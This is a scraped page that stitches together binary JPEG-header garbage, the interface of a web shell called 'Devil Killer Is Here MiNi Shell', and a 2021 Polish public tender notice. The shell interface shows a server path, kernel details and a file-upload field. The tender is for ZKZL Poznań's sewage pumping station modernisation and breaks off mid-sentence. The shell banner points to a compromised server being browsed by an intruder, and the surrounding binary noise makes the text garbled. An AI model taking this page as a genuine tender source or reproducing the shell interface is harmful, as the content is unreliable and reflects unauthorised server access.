JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210716/0011776303-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00117763 z dnia 2021-07-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i wykonanie modernizacji przepompowni ścieków <br/>wraz z dostawą i montażem dwóch zatapialnych pomp <br/>przy ul. Borówki 4c w Poznaniu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD KOMUNALNYCH ZASOBÓW LOKALOWYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 302538131</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Matejki 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-770</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61415 88 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">obsluga.klienta@zkzl.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zkzl.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i wykonanie modernizacji przepompowni ścieków <br/>wraz z dostawą i montażem dwóch zatapialnych pomp <br/>przy ul. Borówki 4c w Poznaniu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d670e044-e617-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00117763</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zkzl_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zkzl_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja między Zamawiającym a wykonawcami odbywa się przy <br/>użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej Zamawiającego.<br/>2. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności <br/>logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności <br/>podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce <br/>„Instrukcje dla Wykonawców" na stronie internetowej pod adresem: <br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji wykonawca akceptuje <br/>regulamin korzystania z Platformy. <br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem <br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu <br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. <br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, <br/>będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego <br/>wykonawcy.<br/>5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości <br/>bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień <br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>6. Zgodnie z § 11 ust. 2 r.d.e. Zamawiający udostępnia poniżej informacje na temat specyfikacji połączenia, <br/>formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych. <br/>Wymagania techniczne związane z korzystaniem z Platformy:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV <br/>2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, <br/>Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja <br/>10 0.,<br/>d) włączona obsługa JavaScript,13<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie <br/>UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas <br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego <br/>Urzędu Miar.<br/>7. Sporządzanie i przekazywanie informacji w tym dokumentów elektronicznych musi być zgodne <br/>z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie <br/>zamówienia publicznego lub konkursie.<br/>8. Wszelką korespondencję związaną z niniejszym postępowaniem należy przekazywać za <br/>pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do <br/>Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej strony <br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej. <br/>9. W sytuacjach awaryjnych, np. w przypadku awarii Platformy, Zamawiający dopuszcza również <br/>możliwość komunikowania się z wykonawcami za pośrednictwem poczty elektronicznej: <br/>obsluga.klienta@zkzl.poznan.pl - z tym zastrzeżeniem, iż oferta, w tym oświadczenia, o których mowa <br/>w Rozdziale VIII pkt 1 lit. a) i b) mogą zostać przekazane wyłącznie za pomocą powyższej Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej RODO informuję, iż:<br/>W świetle powyższego ZKZL informuje, że: 1) Administratorem danych osobowych (dalej:<br/>„Administrator”) jest Zarząd Komunalnych Zasobów Lokalowych Sp. z o.o. z siedzibą w Poznaniu przy<br/>ul. Matejki 57, 60-770 Poznań (dalej ZKZL), wpisany do Krajowego Rejestru Sądowego prowadzonego<br/>przez Sąd Rejonowy Poznań - Nowe Miasto i Wilda w Poznaniu, VIII Wydział Gospodarczy pod<br/>numerem KRS: 0000483352, posiadającym: NIP: 2090002942, Regon: 302538131. W toku<br/>postępowania (do momentu podpisania umowy) w sprawach związanych z Pani/Pana danymi proszę<br/>kontaktować się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej na<br/>adres: IOD ZKZL, 60-770 Poznań, ul. Matejki 57; e-mail: iod@zkzl.poznan.pl. 2) Dane osobowe<br/>zawarte w ofertach są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest<br/>niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze. Celem przetwarzania<br/>danych osobowych jest prowadzenie w imieniu własnym oraz w imieniu i na rzecz jednostek<br/>administracji publicznej na podstawie przepisów Zarządzenia nr 100 Prezesa Rady Ministrów z dnia 30<br/>sierpnia 2017 r. w sprawie wskazania centralnego zamawiającego dla jednostek administracji rządowej<br/>oraz wskazania jednostek administracji rządowej zobowiązanych do nabywania zamówień od<br/>centralnego zamawiającego (M.P. z 2017 r., poz. 832). Przetwarzanie danych osobowych na potrzeby<br/>ww. postępowań mieści się w zakresie działalności statutowej ZKZL, ujawnionym w Rejestrze<br/>Przedsiębiorców Krajowego Rejestru Sądowego. Przetwarzanie tych danych jest niezbędne, aby ZKZL<br/>mogło prawidłowo wypełniać nałożone na nie obowiązki. 3) Odbiorcą Pani/Pana danych osobowych<br/>będą upoważnieni pracownicy ZKZL. 4) Posiada Pani/Pan: −na podstawie art. 15 RODO prawo<br/>dostępu do danych osobowych Pani/Pana dotyczących; −na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych; − na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO;−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. 5) Nie przysługuje Pani/Panu: −w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO; −na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 6)<br/>Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym. Jest Pan/Pani<br/>zobowiązana do ich podania, a konsekwencją niepodania danych osobowych będzie niemożliwość<br/>oceny ofert i zawarcia umowy. 7) Dane udostępnione przez Panią/Pana nie będą podlegały<br/>profilowaniu. 8)Administrator danych nie ma zamiaru przekazywać danych osobowych do państwa<br/>trzeciego lub organizacji międzynarodowej.9)ZKZL dokłada wszelkich starań, aby zapewnić wszelkie<br/>środki fizycznej, technicznej i organizacyjnej ochrony danych osobowych przed ich przypadkowym czy<br/>umyślnym zniszczeniem, przypadkową utratą, zmianą, nieuprawnionym ujawnieniem, wykorzystaniem<br/>czy dostępem, zgodnie ze wszystkimi obowiązującymi przepisami. 10)Pani/Pana dane osobowe będą<br/>przechowywane przez okres: - przez okres 5 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia publicznego, - przez cały czas trwania umowy, - w przypadku zamówień<br/>współfinansowanych ze środków UE przez okres, o którym mowa w art. 125 ust. 4 lit. d) w zw. z art.<br/>140 rozporządzenia nr 1303/2013.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.201.35.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: zaprojektowanie i wykonanie robót w zakresie modernizacji <br/>przepompowni ścieków wraz z dostawą i montażem dwóch zatapialnych pomp przy ul. Borówki 4c <br/>w Poznaniu a w szczególności: <br/>1) opracowanie na podstawie Programu Funkcjonalno-Użytkowego (zwanego dalej PFU): Projektu <br/>technicznego oraz innych dokumentów i opracowań wskazanych w treści Umowy lub w PFU wraz <br/>z uzyskaniem warunków, uzgodnień i pozwoleń, niezbędnych do sporządzenia Projektu <br/>technicznego, a nadto STWiOR, BIOZ, Przedmiar robót oraz kosztorys (opracowania projektowe <br/>wykonywane w ramach przedmiotu Umowy zwane są dalej Dokumentacją), <br/>2) pełnienie czynności nadzoru autorskiego nad realizacją robót, stanowiących przedmiot Umowy <br/>w zakresie sporządzonej w ramach przedmiotu Umowy Dokumentacji, zwanym dalej Nadzorem <br/>autorskim,<br/>3) realizacja robót budowlanych na podstawie Dokumentacji wraz z dokonaniem zgłoszenia <br/>o zakończeniu robót (a w tym zakresie uzyskanie zaświadczenia o braku wniesienia sprzeciwu przez <br/>organ) lub uzyskanie ostatecznej decyzji o pozwoleniu na użytkowanie (w zależności od obowiązku <br/>wynikającego z decyzji o pozwoleniu na budowę lub z obowiązujących przepisów prawa) oraz <br/>wykonaniem dokumentacji powykonawczej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">98395000-8 - Usługi ślusarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się<br/>następującymi kryteriami oceny ofert: I. Cena brutto oferty - waga 60%, II. Okres gwarancji na<br/>wykonane roboty budowlane w miesiącach - waga - 40%. Za najkorzystniejszą zostanie uznana oferta<br/>(spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma<br/>największą łączną liczbę punktów w poszczególnych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu (na zasadach <br/>określonych w Rozdziale VII SWZ) oraz spełniają określone przez Zamawiającego warunki udziału w <br/>postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza warunku w tym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów:<br/>Zamawiający nie wyznacza warunku w tym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza warunku w tym zakresie. <br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający wymaga aby Wykonawca:<br/>a) wykazał, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert wykonał przynajmniej <br/>jedną usługę polegającą na opracowaniu dokumentacji projektowej, której przedmiotem był <br/>remont lub przebudowa przepompowni ścieków,<br/>b) wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert wykonał zamówienie <br/>odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia, tj. wykonał co najmniej <br/>jeden remont lub przebudowę przepompowni ścieków o wartości nie mniejszej niż 140 000,00<br/>zł brutto,<br/>c) dysponował w czasie trwania umowy osobą lub osobami mogącymi wykonywać samodzielne <br/>funkcje techniczne w budownictwie, w zakresie projektowania i kierowania robotami <br/>budowlanymi w specjalności:<br/>- instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>- instalacyjna w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/>wodociągowych i kanalizacyjnych,<br/>Warunek dotyczący dysponowania w czasie trwania umowy co najmniej jedną osobą <br/>mogącą wykonywać samodzielne funkcje techniczne w budownictwie, w zakresie <br/>projektowania i kierowania robotami budowlanymi we wskazanych przez Zamawiającego <br/>specjalnościach zostanie uznany przez Zamawiającego za spełniony również w przypadku, <br/>kiedy Wykonawca wykaże się posiadaniem osób mogących wykonywać samodzielne funkcje <br/>techniczne w budownictwie osobno w zakresie projektowania i osobno w zakresie <br/>kierowania robotami budowlanymi w wymaganych specjalnościach.<br/>3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne <br/>spełnianie warunku przez wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia <br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w <br/>postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty <br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w <br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia <br/>podmiotowych środków dowodowych:<br/>a. na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji;<br/>2) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym <br/>mowa w art. 125 ust. 1 PZP w zakresie odnoszącym się do podstaw wykluczenia wskazanych <br/>w art. 108 ust. 1 pkt 1-6 oraz w art. 109 ust. 1 pkt 1 ustawy PZP - wzór oświadczenia stanowi <br/>załącznik nr 8 do SWZ. <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej:<br/>− zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, o których mowa w pkt 2.1 ppkt 1) - składa dokument lub <br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, <br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza <br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest <br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury <br/>przewidzianej w przepisach miejsca 